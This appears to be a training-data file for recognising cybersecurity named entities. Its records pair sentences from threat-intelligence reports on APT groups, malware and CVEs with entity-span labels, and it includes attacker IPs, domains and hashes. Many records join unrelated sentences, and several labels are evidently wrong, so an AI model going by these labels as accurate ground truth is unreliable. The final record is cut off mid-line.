{"text": "Webinjects : According to the bot ’ s configuration , if a webinject is set for a given application , it will be executed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": {"TOOL: xlsm file": [[162, 171]], "MALWARE: it": [[174, 176]], "THREAT_ACTOR: APT33": [[313, 318]], "ORGANIZATION: military": [[436, 444]], "ORGANIZATION: commercial": [[449, 459]]}, "info": {"id": "cyberner_stix_train_001436", "source": "cyberner_stix_train"}}
{"text": "] comuseraccount [ . The Infy group also appears to engage in espionage activities against foreign governments and businesses . This is supported by contextual information on the Internet for the email address “ lfengg@163.com , ” which was supplied in the registration information for seven of the 107 zones . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"THREAT_ACTOR: Infy group": [[25, 35]], "ORGANIZATION: governments": [[99, 110]], "ORGANIZATION: businesses": [[115, 125]], "TOOL: email": [[196, 201]], "EMAIL: lfengg@163.com": [[212, 226]], "SYSTEM: CSP": [[311, 314]]}, "info": {"id": "cyberner_stix_train_001437", "source": "cyberner_stix_train"}}
{"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 .", "spans": {"TOOL: DoublePulsar backdoor": [[7, 28]], "TOOL: SMB worm": [[55, 63]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[108, 133]], "ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[136, 185]]}, "info": {"id": "cyberner_stix_train_001438", "source": "cyberner_stix_train"}}
{"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": {"ORGANIZATION: GitHub": [[89, 95]], "ORGANIZATION: ASERT": [[153, 158]], "THREAT_ACTOR: TA505": [[295, 300]], "ORGANIZATION: Yoroi CERT": [[383, 393]]}, "info": {"id": "cyberner_stix_train_001439", "source": "cyberner_stix_train"}}
{"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months .", "spans": {"ORGANIZATION: Microsoft Analytics": [[0, 19]], "MALWARE: Winnti": [[31, 37]]}, "info": {"id": "cyberner_stix_train_001440", "source": "cyberner_stix_train"}}
{"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts . From late April to early May , the attackers focused on human rights related NGOs . FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft ’s TechNet , a web portal for IT professionals . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": {"SYSTEM: Android API": [[73, 84]], "ORGANIZATION: Google": [[196, 202]], "ORGANIZATION: FireEye": [[298, 305]], "ORGANIZATION: Microsoft": [[334, 343], [440, 449]], "TOOL: command-and-control": [[386, 405]], "TOOL: C2": [[408, 410]], "TOOL: TechNet": [[453, 460]]}, "info": {"id": "cyberner_stix_train_001441", "source": "cyberner_stix_train"}}
{"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]]}, "info": {"id": "cyberner_stix_train_001442", "source": "cyberner_stix_train"}}
{"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: Trend Micro": [[155, 166]], "THREAT_ACTOR: Patchwork": [[202, 211]], "THREAT_ACTOR: Confucius groups": [[216, 232]]}, "info": {"id": "cyberner_stix_train_001443", "source": "cyberner_stix_train"}}
{"text": "After decrypting the content , the ‘ onload2 ’ function will issue another HTTP GET request with the system data as a parameter , but this time to the C2 using a URL from the ‘ r4 ’ variable .", "spans": {"TOOL: C2": [[151, 153]]}, "info": {"id": "cyberner_stix_train_001444", "source": "cyberner_stix_train"}}
{"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {"TOOL: FuzzBunch plugins": [[79, 96]], "TOOL: DanderSpritz": [[172, 184]]}, "info": {"id": "cyberner_stix_train_001445", "source": "cyberner_stix_train"}}
{"text": "It can thwart detection by automated analysis engines and sandbox solutions .", "spans": {}, "info": {"id": "cyberner_stix_train_001446", "source": "cyberner_stix_train"}}
{"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {}, "info": {"id": "cyberner_stix_train_001447", "source": "cyberner_stix_train"}}
{"text": "Finally , the known targets of the Dukes - Eastern European foreign ministries , western think tanks and governmental organizations , even Russian-speaking drug dealers - conform to publiclyknown Russian foreign policy and security policy interests .", "spans": {"THREAT_ACTOR: Dukes": [[35, 40]]}, "info": {"id": "cyberner_stix_train_001448", "source": "cyberner_stix_train"}}
{"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in .", "spans": {"ORGANIZATION: social engineering": [[28, 46]], "TOOL: remote administration tools": [[199, 226]], "TOOL: RATs": [[229, 233]], "ORGANIZATION: oil and gas": [[358, 369]], "FILEPATH: SWAnalytics": [[458, 469]]}, "info": {"id": "cyberner_stix_train_001449", "source": "cyberner_stix_train"}}
{"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": {"THREAT_ACTOR: activity group": [[91, 105]], "ORGANIZATION: Microsoft": [[114, 123]], "THREAT_ACTOR: PLATINUM": [[139, 147]]}, "info": {"id": "cyberner_stix_train_001450", "source": "cyberner_stix_train"}}
{"text": "We have since been able to identify at least two separate OnionDuke botnets .", "spans": {"MALWARE: OnionDuke": [[58, 67]]}, "info": {"id": "cyberner_stix_train_001451", "source": "cyberner_stix_train"}}
{"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": {"MALWARE: Ginp": [[115, 119], [211, 215]], "THREAT_ACTOR: APT10": [[428, 433]], "TOOL: C2": [[554, 556]], "MALWARE: 9002": [[573, 577]], "MALWARE: Daserf": [[581, 587]], "TOOL: Adobe Flash": [[623, 634]], "VULNERABILITY: Zero-day": [[635, 643]], "ORGANIZATION: FireEye": [[656, 663]]}, "info": {"id": "cyberner_stix_train_001452", "source": "cyberner_stix_train"}}
{"text": "Here ’ s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" . One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"ORGANIZATION: provider": [[222, 230]], "THREAT_ACTOR: CobaltGoblin": [[367, 379]], "THREAT_ACTOR: FIN7": [[384, 388]], "SYSTEM: CSP": [[528, 531]]}, "info": {"id": "cyberner_stix_train_001453", "source": "cyberner_stix_train"}}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: legitimate administration tools": [[15, 46]], "VULNERABILITY: zero-day": [[232, 240]], "TOOL: Adobe Flash Player": [[241, 259]]}, "info": {"id": "cyberner_stix_train_001454", "source": "cyberner_stix_train"}}
{"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( “ content : //call_log/calls ” , info : callname , callnum , calldate , calltype , callduration Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"THREAT_ACTOR: Silence:": [[522, 530]], "ORGANIZATION: Group-IB's": [[655, 665]], "MALWARE: Carbanak": [[703, 711]], "THREAT_ACTOR: criminals": [[778, 787]], "ORGANIZATION: financial industry": [[828, 846]], "ORGANIZATION: customers": [[870, 879]]}, "info": {"id": "cyberner_stix_train_001455", "source": "cyberner_stix_train"}}
{"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East . It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"MALWARE: RuMMS": [[29, 34]], "THREAT_ACTOR: OilRig": [[107, 113]], "THREAT_ACTOR: threat group": [[114, 126]], "ORGANIZATION: insurance agency": [[200, 216]], "SYSTEM: Microsoft Exchange servers": [[436, 462]], "ORGANIZATION: Microsoft": [[465, 474]]}, "info": {"id": "cyberner_stix_train_001456", "source": "cyberner_stix_train"}}
{"text": "In this way , the advanced HammerDuke variant attempts to hide its network traffic in more legitimate use of Twitter .", "spans": {"MALWARE: HammerDuke": [[27, 37]], "TOOL: Twitter": [[109, 116]]}, "info": {"id": "cyberner_stix_train_001457", "source": "cyberner_stix_train"}}
{"text": "Based on this , we are confident in our conclusion that the Dukes ’ primary mission is the collection of intelligence to support foreign and security policy decision-making .", "spans": {"THREAT_ACTOR: Dukes": [[60, 65]]}, "info": {"id": "cyberner_stix_train_001458", "source": "cyberner_stix_train"}}
{"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . They kept track of their targeted attacks by embedding a “ campaign tag ” in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"TOOL: Lambert family malware": [[159, 181]], "ORGANIZATION: FireEye": [[232, 239]], "VULNERABILITY: zero day exploit": [[262, 278]], "VULNERABILITY: CVE-2014-4148": [[281, 294]], "SYSTEM: twitter": [[537, 544]], "ORGANIZATION: CSP": [[590, 593]]}, "info": {"id": "cyberner_stix_train_001459", "source": "cyberner_stix_train"}}
{"text": "This appears to be necessary to determine the number of banks the victim may use . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: documents": [[87, 96]], "VULNERABILITY: CVE-2012-0158": [[180, 193]], "VULNERABILITY: Microsoft Word vulnerabilities": [[249, 279]], "ORGANIZATION: ESET": [[324, 328]], "SYSTEM: Win32": [[347, 352]], "FILEPATH: Shadowpad.C": [[355, 366]], "MALWARE: trojan": [[367, 373], [392, 398]], "SYSTEM: Win64": [[374, 379]], "FILEPATH: Winnti.CA": [[382, 391]], "ORGANIZATION: CrowdStrike researchers": [[406, 429]], "MALWARE: CozyDuke": [[483, 491]], "MALWARE: CozyBear": [[508, 516]], "MALWARE: CozyCar": [[519, 526]], "MALWARE: Office Monkeys": [[531, 545]], "THREAT_ACTOR: APT29": [[633, 638]], "ORGANIZATION: US White House": [[793, 807]], "ORGANIZATION: Department of State": [[810, 829]], "ORGANIZATION: Democratic National Committee": [[838, 867]]}, "info": {"id": "cyberner_stix_train_001460", "source": "cyberner_stix_train"}}
{"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": {"MALWARE: TrickBot": [[60, 68]], "THREAT_ACTOR: Cloud Atlas": [[210, 221]], "VULNERABILITY: CVE-2017-11882": [[337, 351]], "VULNERABILITY: CVE-2018-0802": [[363, 376]], "ORGANIZATION: financial institution": [[469, 490]]}, "info": {"id": "cyberner_stix_train_001461", "source": "cyberner_stix_train"}}
{"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . Below is a list of AdrGen . Mandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or otherwise unable to be identified through other forms of analysis .", "spans": {"ORGANIZATION: Twitter": [[41, 48]], "ORGANIZATION: FireEye": [[97, 104]], "TOOL: RIPTIDE": [[130, 137]], "TOOL: HIGHTIDE": [[141, 149]], "THREAT_ACTOR: APT12": [[220, 225]], "MALWARE: attacker payloads": [[364, 381]]}, "info": {"id": "cyberner_stix_train_001462", "source": "cyberner_stix_train"}}
{"text": "Interestingly , the nature of these modifications suggests that their primary purpose was to regain the element of stealth and undetectability that had been lost almost a year earlier .", "spans": {}, "info": {"id": "cyberner_stix_train_001463", "source": "cyberner_stix_train"}}
{"text": "We saw five samples built on the same date in December 2015 , and six on the same date in January , further solidifying the link between each sample .", "spans": {}, "info": {"id": "cyberner_stix_train_001464", "source": "cyberner_stix_train"}}
{"text": "Exhibit 4 shows the network traffic generated by the sample , a http POST request containing the system information collected .", "spans": {}, "info": {"id": "cyberner_stix_train_001465", "source": "cyberner_stix_train"}}
{"text": "Downeks is a backdoor with only very basic capabilities .", "spans": {"MALWARE: Downeks": [[0, 7]]}, "info": {"id": "cyberner_stix_train_001466", "source": "cyberner_stix_train"}}
{"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten ’ s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . This company seems to have been used by the FIN7 threat actor to hire new people as translators , developers and pentesters . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": {"MALWARE: Bouncing Golf": [[62, 75], [201, 214]], "MALWARE: Domestic Kitten": [[80, 95], [130, 145], [235, 250]], "THREAT_ACTOR: FIN7": [[542, 546]], "THREAT_ACTOR: Adversaries": [[624, 635]], "MALWARE: Bundlore": [[851, 859]], "TOOL: mktemp utility": [[869, 883]]}, "info": {"id": "cyberner_stix_train_001467", "source": "cyberner_stix_train"}}
{"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware . COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[178, 190]], "ORGANIZATION: social media": [[204, 216]], "ORGANIZATION: social engineering": [[260, 278]], "TOOL: ProxyNotShell": [[430, 443]], "TOOL: Remote PowerShell service": [[482, 507]]}, "info": {"id": "cyberner_stix_train_001468", "source": "cyberner_stix_train"}}
{"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": {"TOOL: DropIt sample": [[28, 41]], "MALWARE: %TEMP%\\flash_update.exe": [[179, 202]], "TOOL: Flash Player installer": [[227, 249]], "ORGANIZATION: electric companies": [[355, 373]]}, "info": {"id": "cyberner_stix_train_001469", "source": "cyberner_stix_train"}}
{"text": "Analysis of this campaign shows us once more that attackers are creative and use the news to compromise the targets .", "spans": {}, "info": {"id": "cyberner_stix_train_001470", "source": "cyberner_stix_train"}}
{"text": "JUNE 2015 , Germany ’s Federal Office for Security in Information Technology ( BSI ) announced that APT28 was likely responsible for the spear phishing emails sent to members of several German political parties .", "spans": {"THREAT_ACTOR: APT28": [[100, 105]], "TOOL: emails": [[152, 158]]}, "info": {"id": "cyberner_stix_train_001471", "source": "cyberner_stix_train"}}
{"text": "The export called “ k ” is a wrapper for the “ LoadLibraryA ” API function .", "spans": {}, "info": {"id": "cyberner_stix_train_001472", "source": "cyberner_stix_train"}}
{"text": "SHA256 0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa .", "spans": {"FILEPATH: 0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa": [[7, 71]]}, "info": {"id": "cyberner_stix_train_001473", "source": "cyberner_stix_train"}}
{"text": "Activities are key building blocks , central to an app ’ s navigation , for example . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": {"ORGANIZATION: Group-IB": [[96, 104]], "MALWARE: Ivoke": [[170, 175]], "THREAT_ACTOR: Operation Cleaver": [[288, 305]]}, "info": {"id": "cyberner_stix_train_001474", "source": "cyberner_stix_train"}}
{"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162.250.145.222 [REDACTED].ddns.net . loop all over the string to execute the decoding operation .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Google Play": [[89, 100]], "ORGANIZATION: Microsoft": [[124, 133]], "ORGANIZATION: Facebook": [[158, 166]], "THREAT_ACTOR: Lazarus Group": [[257, 270]], "THREAT_ACTOR: APT33": [[273, 278]], "IP_ADDRESS: 162.250.145.222": [[281, 296]], "DOMAIN: [REDACTED].ddns.net": [[297, 316]]}, "info": {"id": "cyberner_stix_train_001475", "source": "cyberner_stix_train"}}
{"text": "Call logs . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"THREAT_ACTOR: APT34": [[31, 36]], "VULNERABILITY: Microsoft Office vulnerability": [[51, 81]], "VULNERABILITY: CVE-2017-11882": [[82, 96]], "TOOL: POWRUNER": [[107, 115]], "TOOL: BONDUPDATER": [[120, 131]], "ORGANIZATION: Microsoft": [[155, 164]], "THREAT_ACTOR: PROMETHIUM": [[182, 192]], "THREAT_ACTOR: NEODYMIUM": [[197, 206]], "VULNERABILITY: exploit": [[220, 227]], "VULNERABILITY: CVE-2016-4117": [[232, 245]], "TOOL: Flash": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001476", "source": "cyberner_stix_train"}}
{"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals . In ping mode, Glimpse uses a .NET . Figure 8 : Scilc.exe usage example", "spans": {"ORGANIZATION: Apple": [[91, 96]], "THREAT_ACTOR: APT12": [[135, 140]], "MALWARE: Glimpse": [[237, 244]], "FILEPATH: a .NET": [[250, 256]], "TOOL: Scilc.exe": [[270, 279]]}, "info": {"id": "cyberner_stix_train_001477", "source": "cyberner_stix_train"}}
{"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: DanaBot": [[0, 7]], "TOOL: Trojan": [[13, 19]], "ORGANIZATION: security firm": [[103, 116]], "ORGANIZATION: military officials": [[149, 167]], "TOOL: emails": [[187, 193]], "TOOL: Adobe Reader": [[239, 251]], "VULNERABILITY: vulnerability": [[252, 265]]}, "info": {"id": "cyberner_stix_train_001478", "source": "cyberner_stix_train"}}
{"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game’s build environment , and then have their malware distributed as legitimate software . securityd-555549440fca1d2f1e613094b0c768d393f83d7f", "spans": {"MALWARE: Chrysaor": [[88, 96]], "THREAT_ACTOR: Leafminer": [[149, 158]], "THREAT_ACTOR: operators": [[159, 168]], "VULNERABILITY: EternalBlue": [[173, 184]], "MALWARE: securityd-555549440fca1d2f1e613094b0c768d393f83d7f": [[498, 548]]}, "info": {"id": "cyberner_stix_train_001479", "source": "cyberner_stix_train"}}
{"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim ’ s phone . It seems that the main objective of the attackers was information gathering from the infected computers . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": {"MALWARE: ISMDoor": [[287, 294]]}, "info": {"id": "cyberner_stix_train_001480", "source": "cyberner_stix_train"}}
{"text": "It also shows a current malware log . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . APT33 : 162.250.145.234 mynetwork.ddns.net . Money as a motivation may be the most frequent but also easiest to deal with of the four .", "spans": {"TOOL: backdoor Trojan": [[43, 58]], "TOOL: Volgmer": [[61, 68]], "THREAT_ACTOR: APT33": [[275, 280]], "IP_ADDRESS: 162.250.145.234": [[283, 298]], "DOMAIN: mynetwork.ddns.net": [[299, 317]]}, "info": {"id": "cyberner_stix_train_001481", "source": "cyberner_stix_train"}}
{"text": "] 87:28844 61 [ . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory . Check that there is more than 5 GB of disk space on the NetScaler device available ( instructions from vendor ) .", "spans": {"THREAT_ACTOR: Dukes": [[22, 27]], "THREAT_ACTOR: cyberespionage group": [[82, 102]]}, "info": {"id": "cyberner_stix_train_001482", "source": "cyberner_stix_train"}}
{"text": "Figure 28 : Jaguar Kill Switch infected GP apps Peek Into the Actor Based on all of the above , we connected “ Agent Smith ” campaign to a Chinese internet company located in Guangzhou whose front end legitimate business is to help Chinese Android developers publish and promote their apps on overseas platforms . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 . Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": {"MALWARE: Agent Smith": [[111, 122]], "SYSTEM: Android": [[240, 247]], "TOOL: Quik": [[393, 397]], "TOOL: Ranbyus": [[404, 411]]}, "info": {"id": "cyberner_stix_train_001483", "source": "cyberner_stix_train"}}
{"text": "As our researchers discovered , it also lays its hands on the outgoing SMS and filters the incoming ones . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": {"VULNERABILITY: zero-day vulnerability": [[135, 157]], "THREAT_ACTOR: actors": [[455, 461]]}, "info": {"id": "cyberner_stix_train_001484", "source": "cyberner_stix_train"}}
{"text": "On September 10 , 2019 , we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization .", "spans": {"THREAT_ACTOR: unknown": [[37, 44]], "TOOL: SharePoint": [[89, 99]], "VULNERABILITY: CVE-2019-0604": [[113, 126]]}, "info": {"id": "cyberner_stix_train_001485", "source": "cyberner_stix_train"}}
{"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": {"MALWARE: Triada": [[15, 21]], "SYSTEM: Android": [[99, 106]], "SYSTEM: Windows-based": [[197, 210]], "MALWARE: RTF files": [[269, 278]], "VULNERABILITY: CVE-2018-0798": [[299, 312]], "THREAT_ACTOR: APT34": [[381, 386]]}, "info": {"id": "cyberner_stix_train_001486", "source": "cyberner_stix_train"}}
{"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis group": [[20, 36]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[54, 95]], "VULNERABILITY: CVE-2016-4117": [[98, 111]], "TOOL: FinSpy": [[158, 164]], "MALWARE: Epic Turla": [[246, 256]], "ORGANIZATION: embassies": [[335, 344]]}, "info": {"id": "cyberner_stix_train_001487", "source": "cyberner_stix_train"}}
{"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks . These versions of KeyBoy differed from the one first described by Rapid7 in several ACTs , many of which will be described in the sections to follow .", "spans": {"ORGANIZATION: Volexity": [[29, 37]], "THREAT_ACTOR: Patchwork": [[69, 78]], "MALWARE: KeyBoy": [[188, 194]], "ORGANIZATION: Rapid7": [[236, 242]]}, "info": {"id": "cyberner_stix_train_001488", "source": "cyberner_stix_train"}}
{"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"THREAT_ACTOR: APT15": [[377, 382]], "FILEPATH: order.jpg": [[460, 469]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[517, 551]], "ORGANIZATION: Astamirov": [[554, 563]]}, "info": {"id": "cyberner_stix_train_001489", "source": "cyberner_stix_train"}}
{"text": "It ’ s a messaging object that can be used to request an action from another app component . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor . That usually means that the name of the file inside the archive ends with 2 known file extensions “pdf.<extension>” (archiving tools usually defaults the <extension> to the archive’s format e.g. ) . The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": {"THREAT_ACTOR: Ke3chang": [[142, 150]], "THREAT_ACTOR: APT group": [[151, 160]], "ORGANIZATION: ESET": [[163, 167]], "THREAT_ACTOR: group": [[243, 248]], "SYSTEM: IEC 60870 - 5 - 104 ( IEC-104 ) devices": [[568, 607]], "SYSTEM: remote terminal units ( RTUs )": [[618, 648]]}, "info": {"id": "cyberner_stix_train_001490", "source": 